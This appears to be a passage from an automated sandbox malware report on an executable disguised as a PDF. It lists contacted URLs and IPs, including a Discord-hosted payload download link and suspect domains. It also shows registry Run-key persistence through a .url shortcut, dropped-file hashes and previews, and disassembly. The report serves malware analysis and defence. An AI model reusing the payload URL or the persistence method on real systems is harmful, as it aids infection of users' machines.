https://cdn.discordapp.com/	DOC209272621615.PDF.exe, 00000000.00000003.288963925.00000000007AB000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294309422.00000000007B2000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294280203.0000000000769000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000002.331410087.0000000000769000.00000004.00000020.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/lity/2.3.1/lity.min.js?ver=5.8.2	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
https://sumikkoremon.com/	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://sumikkoremon.com/wp-content/cache/autoptimize/js/autoptimize_11a5c4c4430017076e7a7babc5eec58b	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
https://widgets.getpocket.com/v1/j/btn.js?v=1	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.2/TweenMax.min.js?ver=5.8.2	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/lity/2.3.1/lity.min.css	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false		high
http://scheme.org/SiteNavigationElement	rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflyt	Wkklnmcz.exe, 0000000A.00000002.351491610.0000000002FFB000.00000004.00000001.sdmp	false		high
http://www.era636.com/pvxz/?e0DDHLix=lq5nkvJODZO3vjBQ1IcTTlcoFI8MUDuIstt0HJAs3uVUg2aG8/bxRH4x4Hgr0vc	rundll32.exe, 00000012.00000003.791203124.0000000000509000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.117.217	unknown	United States		22612	NAMECHEAP-NETUS	true
86.105.245.69	www.neema.xyz	Netherlands		20857	TRANSIP-ASAmsterdamtheNetherlandsNL	false
156.235.157.134	www.meishangtianhua.com	Seychelles		134548	DXTL-HKDXTLTseungKwanOServiceHK	false
15.197.142.173	localproperty.team	United States		7430	TANDEMUS	false
163.44.239.73	sumikkoremon.com	Japan		7506	INTERQGMOInternetIncJP	false
165.32.109.217	www.era636.com	United States		37053	RSAWEB-ASZA	false
156.67.222.132	tourbox.xyz	Cyprus		47583	AS-HOSTINGERLT	false
66.235.200.145	cis136-tgarza.com	United States		13335	CLOUDFLARENETUS	false
162.159.130.233	unknown	United States		13335	CLOUDFLARENETUS	false
162.159.129.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false
64.69.40.19	www.hwkm.net	United States		35916	MULTA-ASN1US	false
154.81.158.75	www.hbjngs.com	Seychelles		8100	ASN-QUADRANET-GLOBALUS	false
198.54.117.211	parkingpage.namecheap.com	United States		22612	NAMECHEAP-NETUS	false
68.70.164.19	jardingenesis.com	United States		22458	NETSOURCEUS	false
197.248.5.16	finetipster.com	Kenya		37061	SafaricomKE	false
2.57.90.16	sa-pontianak.com	Lithuania		47583	AS-HOSTINGERLT	false
23.224.31.114	nc1cname.com	United States		40065	CNSERVERSUS	false

Private

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532011
Start date:	01.12.2021
Start time:	16:21:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DOC209272621615.PDF.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/11@23/18
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.9% (good quality ratio 21.8%) Quality average: 76.7% Quality standard deviation: 29.5%
HCA Information:	Successful, ratio: 96% Number of executed functions: 132 Number of non-executed functions: 377
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.189.173.20 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/532011/sample/DOC209272621615.PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
16:22:55	API Interceptor	1x Sleep call for process: DOC209272621615.PDF.exe modified
16:23:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz C:\Users\user\Contacts\zcmnlkkW.url
16:23:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz C:\Users\user\Contacts\zcmnlkkW.url
16:23:14	API Interceptor	2x Sleep call for process: Wkklnmcz.exe modified
16:23:14	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DOC209272621615._dfc05767de3ae9a241916a7c856d74a109742f3_39720528_0adf49ee\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.172817276835062
Encrypted:	false
SSDEEP:	192:bdErVAFNHFHxPYMjSEPcuHC/u7sSS274ItvZ:xYyFV1xPYMj3C/u7sSX4ItB
MD5:	67C856C81C8C00A19732CA1C3FBB8BFC
SHA1:	A5B6F506BF5A1AA766EE532DAE289A6A8B754CC0
SHA-256:	C92D5B5D5E300423586921D6B9654D73D8ECDF316E6D4995EFF5D7C5EF800578
SHA-512:	6A1E9920221DCC0D7DB366069E5FC8A4023F9BC0B340B2BD54F1D685A1C437B74207AADD061D274845D79554DD56222E548877A902F0A1F0778F83B8607774A7
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.7.8.1.8.4.2.6.9.7.8.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.7.8.1.9.0.1.6.9.7.0.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.4.d.3.0.1.e.-.8.e.4.3.-.4.7.8.9.-.a.c.a.7.-.5.8.b.5.4.e.9.b.6.8.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.7.5.1.e.2.3.-.a.c.2.e.-.4.c.d.2.-.8.1.d.2.-.a.a.0.b.7.3.3.1.b.c.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.O.C.2.0.9.2.7.2.6.2.1.6.1.5...P.D.F...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.f.0.-.0.0.0.1.-.0.0.1.c.-.3.f.8.2.-.1.1.c.0.1.2.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.f.3.8.c.5.5.e.8.f.7.c.9.0.b.4.f.9.6.1.5.5.e.c.0.4.d.e.3.e.4.e.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.8.2.9.0.8.b.8.d.c.d.d.d.6.e.f.4.4.d.8.0.e.0.f.6.4.9.1.a.d.8.7.b.8.0.e.5.3.d.!.D.O.C.2.0.9.2.7.2.6.2.1.6.1.5...P.D.F...e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2119.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 2 00:23:06 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	120426
Entropy (8bit):	2.0636676014152053
Encrypted:	false
SSDEEP:	384:9vgwczhU5K2DZ2ZkIOZX6DZki9MPQPs6X32D55sgNjIRPLlYg664jKtZd:CF2DZ2ZkIOZX6DiCdskw5HGPLX6JKL
MD5:	663BECCAC70FA7C88880231814447373
SHA1:	A36AE9F778210AA52549200041E4F52CC30DDA5C
SHA-256:	AD8603B705A86E063EBF6FA9211B868EBF1F8387160E381346A5070403C7DBE5
SHA-512:	5DEC87AA08B8AEEDCE57752B1E4B37F87DDD76A1E2038978985C3DF6711F7E1155C0E49B8F6A87294925331D49CAC3864C7BEB3301E543A70213A2097B8DB07D
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ..........a............D...........X!..L.......$....Z..........T.......8...........T............S..............*...........,...................................................................U...........B......(-......GenuineIntelW...........T..............a.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CD2.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8424
Entropy (8bit):	3.699598642610419
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6665JmF6YFMSUvWSgmfg08SECprr89bmb3sf4Ajm:RrlsNi/65J06YOSUvWSgmfg08Swmb8f6
MD5:	282DF6263DDA26E340A7AFA81DB39F02
SHA1:	F34242AD4067BC40A70EE15A99E1ADFE2967E666
SHA-256:	D985E53F28B2D3141BE37D7DA1D6F603F5398DF515FE41243897E980072F9B3C
SHA-512:	BCB1AD6C73C74E07C1C8A77B574B9E522150D365AB50C8421C8336790A05CFDF6A899C405460597326EE741F4E899DD03CD0061260FF59223CA315DF27432A67
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F53.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4715
Entropy (8bit):	4.492705837037102
Encrypted:	false
SSDEEP:	48:cvIwSD8zsNJgtWI95YVSWSC8B78fm8M4Jo0W/6Fo+q8v5W/8BoT4TXd:uITfnmYVzSNCJMfKs8B0EXd
MD5:	71E889F4BA80EAC9303B9FAB96948441
SHA1:	7CAA447935232F98A6C61BE5A40F3B89F0E6C5E7
SHA-256:	F68A97CD565BCB7F22276EC45507945CEF37773304D232AD2CC8CDD5FBF18AAE
SHA-512:	41A7C71E08EB22FA8CA283425E78B2FD877BF1633FB9C1A93357F5E4F6BF0936B228946114E76805B420C13FE10D7D4A1C353E2AC0CC57E0EFC597DF8186CD49
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279293" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Wkklnmczcyrsyafzucgflytssyuynbb[1] Download File
Process:	C:\Users\user\Desktop\DOC209272621615.PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	281088
Entropy (8bit):	7.986323718936903
Encrypted:	false
SSDEEP:	6144:sMdqsz3mu4D3PNRXDdZf0lxKJuimC+jNeAmyGNktPKFsn:se37SzTdZf0qJONXmyGkyE
MD5:	95C7205834A4A92A4F9BFC212C2326DC
SHA1:	80A86D2BB252876D296C56B0F12CFCD28901819D
SHA-256:	349D10CB526E22AF2138861D8B96082CC68D6E56AC188FFC80D844361CB8E4F8
SHA-512:	4561CE75B68091DCBAEB84B259329C03BE564C98968261AB37FA6786F4731147F966D82D97AC32A5600C8B312B95A3F262F94F475EEFA864DBAE31C980F73660
Malicious:	false
Reputation:	unknown
Preview:	.-...y..D....9......l.7...n.....6%.`..h..a..CKP..H.xMZ.....-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#..m..`.......1..R...zZ..;...7.MN..y...N......d.....Su.+.KMML.ej......=..i3.G`.......1..R...zZ..;...7.MN..y...N......d.....Su.+.KMML.ej......=..i3.G`.......1..R...zZ..;...7.MN..y...N......d.....Su.+.KMML.ej......=..i3..V#S.`..h.SG...~lD.....'.../....(P..qigL.p...........`..4A*K.q{q^.eF..3.b.@....^...1....y\..Z[..,..f+.......%d......P.w.P.&3..T_..3K.,...t.l"z..O!_..>.aW.........r1. .?..F...oi.G.g..P".~....._+...).I....6y.K..T..M}./.....~....5...C..Z..u.]^...).P.&3.mgY/.j.B.....=ob.kl.:kqh.'......1.....y.^...4F...oix..C...-.om..I..$$2C...!.=.0B.4E......I..$$2C...!.=.0B.4E......I..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Wkklnmczcyrsyafzucgflytssyuynbb[1] Download File
Process:	C:\Users\user\Contacts\Wkklnmcz.exe
File Type:	data
Category:	dropped
Size (bytes):	281088
Entropy (8bit):	7.986323718936903
Encrypted:	false
SSDEEP:	6144:sMdqsz3mu4D3PNRXDdZf0lxKJuimC+jNeAmyGNktPKFsn:se37SzTdZf0qJONXmyGkyE
MD5:	95C7205834A4A92A4F9BFC212C2326DC
SHA1:	80A86D2BB252876D296C56B0F12CFCD28901819D
SHA-256:	349D10CB526E22AF2138861D8B96082CC68D6E56AC188FFC80D844361CB8E4F8
SHA-512:	4561CE75B68091DCBAEB84B259329C03BE564C98968261AB37FA6786F4731147F966D82D97AC32A5600C8B312B95A3F262F94F475EEFA864DBAE31C980F73660
Malicious:	false
Reputation:	unknown
Preview:	.-...y..D....9......l.7...n.....6%.`..h..a..CKP..H.xMZ.....-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#.u...R...$y..D....r...F.i-.s<#..m..`.......1..R...zZ..;...7.MN..y...N......d.....Su.+.KMML.ej......=..i3.G`.......1..R...zZ..;...7.MN..y...N......d.....Su.+.KMML.ej......=..i3.G`.......1..R...zZ..;...7.MN..y...N......d.....Su.+.KMML.ej......=..i3..V#S.`..h.SG...~lD.....'.../....(P..qigL.p...........`..4A*K.q{q^.eF..3.b.@....^...1....y\..Z[..,..f+.......%d......P.w.P.&3..T_..3K.,...t.l"z..O!_..>.aW.........r1. .?..F...oi.G.g..P".~....._+...).I....6y.K..T..M}./.....~....5...C..Z..u.]^...).P.&3.mgY/.j.B.....=ob.kl.:kqh.'......1.....y.^...4F...oix..C...-.om..I..$$2C...!.=.0B.4E......I..$$2C...!.=.0B.4E......I..

C:\Users\user\Contacts\Wkklnmcz.exe Download File
Process:	C:\Users\user\Desktop\DOC209272621615.PDF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	701952
Entropy (8bit):	6.590546616206496
Encrypted:	false
SSDEEP:	12288:4e7bzFk/k/JOcISOgk3CTMI5a5+a1nWO4YghWxdESUyo2XMw:4sOsRkSOgk3ClO+EWO4YQOESUD2Xx
MD5:	E5D9DB9823FB854169E25FCECA42E804
SHA1:	9982908B8DCDDD6EF44D80E0F6491AD87B80E53D
SHA-256:	DBE703A0B4D7694E0D05D6A1F5F8C8BBAE4A8D6B5ACBA1238DA5B2F523FA9565
SHA-512:	4E97B9BE7970D84272570CE16B835F6A9262A72D72895C573C9A1A572A63436876195520F0D43594947A1C05378B41582F377A663D3B99E0B0FAEF829984FD13
Malicious:	true
Yara Hits:	Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\Contacts\Wkklnmcz.exe, Author: Florian Roth
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................p..v&...0..........................pe..................................................`w...............................text...P........................... ..`.itext.............................. ..`.data...L........ ..................@....bss.....7...0....... ...................idata..v&...p...(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc..pe.......f...J..............@..B.rsrc........0......................@..@.............@......................@..@................................................................................................

C:\Users\user\Contacts\Wkklnmcz.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\DOC209272621615.PDF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Contacts\zcmnlkkW.url Download File
Process:	C:\Users\user\Desktop\DOC209272621615.PDF.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Wkklnmcz.exe">), ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	87
Entropy (8bit):	4.82862772603408
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+T+Bf5rim8G8EovsGKd/L:HRYFVmTWD0p+Guvsb/L
MD5:	E66B29629A1706E8ECE47AA28FF39F76
SHA1:	FE837862F5A9191FFD162B07CCD61A22E6F74ACF
SHA-256:	EFC81521919F35F95E729D57EB09C0FC1BD98D0051A38F6D840352C82CE33CE1
SHA-512:	288EFA77E04CD1C5D234302A1AFB90EC49CA0F6A7045B8D1BBD203FBBBC93F5FE69581207D46A7B7F5C99DAC83F4450A41274C0FB1A99BFDD2D3EC156AF6F00D
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\zcmnlkkW.url, Author: @itsreallynick (Nick Carr)
Reputation:	unknown
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\user\\Contacts\\Wkklnmcz.exe"..IconIndex=77..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.276700509440336
Encrypted:	false
SSDEEP:	12288:gJ6Gt/hhQfY3KVkugoy3oU7YeE3wYt10WDOFd+r8CVJo1hn4kJvYLGr:q6Gt/hhQfY3KVk1mqr
MD5:	0A199F48A50113B6CCF560EAEE40110A
SHA1:	48ABA7820246D8BF372C253EAEEC8CC81EC61144
SHA-256:	3EFF7BB80835626DDF199FA1E48BD4F094CD69C8B539FD9B40B5A04F91D9A698
SHA-512:	CABE59B303A038417A8647DEAF63C14675B2098BE43D59258C1E2C78FB52E39FE4AF74F2CC9F12269F9537B0F63F831439E99A4D59970DAAB50353AF98AF5301
Malicious:	false
Reputation:	unknown
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.001404213710496
Encrypted:	false
SSDEEP:	384:ovujWT5Rftx1yPJ4XpQFFn+7kVPBqXNSeq5QMVyiy+/Xl4Lk4BZd1DoXzne+CX8W:iu4Rftx1oJ4XKFF+7qBqXMeq5QMVyiyf
MD5:	DF5DE94921A5EE2BDC5D1A4AB525CB47
SHA1:	9D9678124F22733A616535C97B113D3E136BAF31
SHA-256:	4229E63DDB16729A95F6F6A2FE8F9A11AC8F2B0BD8F0235522D3EE5CA88C7375
SHA-512:	22C0091F5A87085FE964D7DB5271084E89FA4FA7F7B85CF7D90A460B8D80AA4D2FB1899ACCE87D03CC92B28F1CCDC499F885F62492AC6DD7AB6E696EF63CF0E0
Malicious:	false
Reputation:	unknown
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm......................................................................................................................................................................................................................................................................................................................................................HvLE.^......Y...........W.BJ..N].<.............0................... ..hbin................p.\..,..........nk,.............8........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ............. ........................... .......Z.......................Root........lf......Root....nk ..4.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.590546616206496
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	DOC209272621615.PDF.exe
File size:	701952
MD5:	e5d9db9823fb854169e25fceca42e804
SHA1:	9982908b8dcddd6ef44d80e0f6491ad87b80e53d
SHA256:	dbe703a0b4d7694e0d05d6a1f5f8c8bbae4a8d6b5acba1238da5b2f523fa9565
SHA512:	4e97b9be7970d84272570ce16b835f6a9262a72d72895c573c9a1a572a63436876195520f0d43594947a1c05378b41582f377a663d3b99e0b0faef829984fd13
SSDEEP:	12288:4e7bzFk/k/JOcISOgk3CTMI5a5+a1nWO4YghWxdESUyo2XMw:4sOsRkSOgk3ClO+EWO4YQOESUD2Xx
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon

Icon Hash:	3670910284e2d9b0

Static PE Info

General
Entrypoint:	0x460bbc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	dd63229d7f836c6d43eb2d74e621d69e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045FAD8h
call 00007F7E50BF6FADh
nop
nop
nop
nop
nop
nop
mov eax, dword ptr [00462DA4h]
mov eax, dword ptr [eax]
call 00007F7E50C47573h
mov ecx, dword ptr [00462F30h]
mov eax, dword ptr [00462DA4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045F8B0h]
call 00007F7E50C47573h
mov eax, dword ptr [00462DA4h]
mov eax, dword ptr [eax]
call 00007F7E50C475E7h
call 00007F7E50BF4CF6h
nop
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
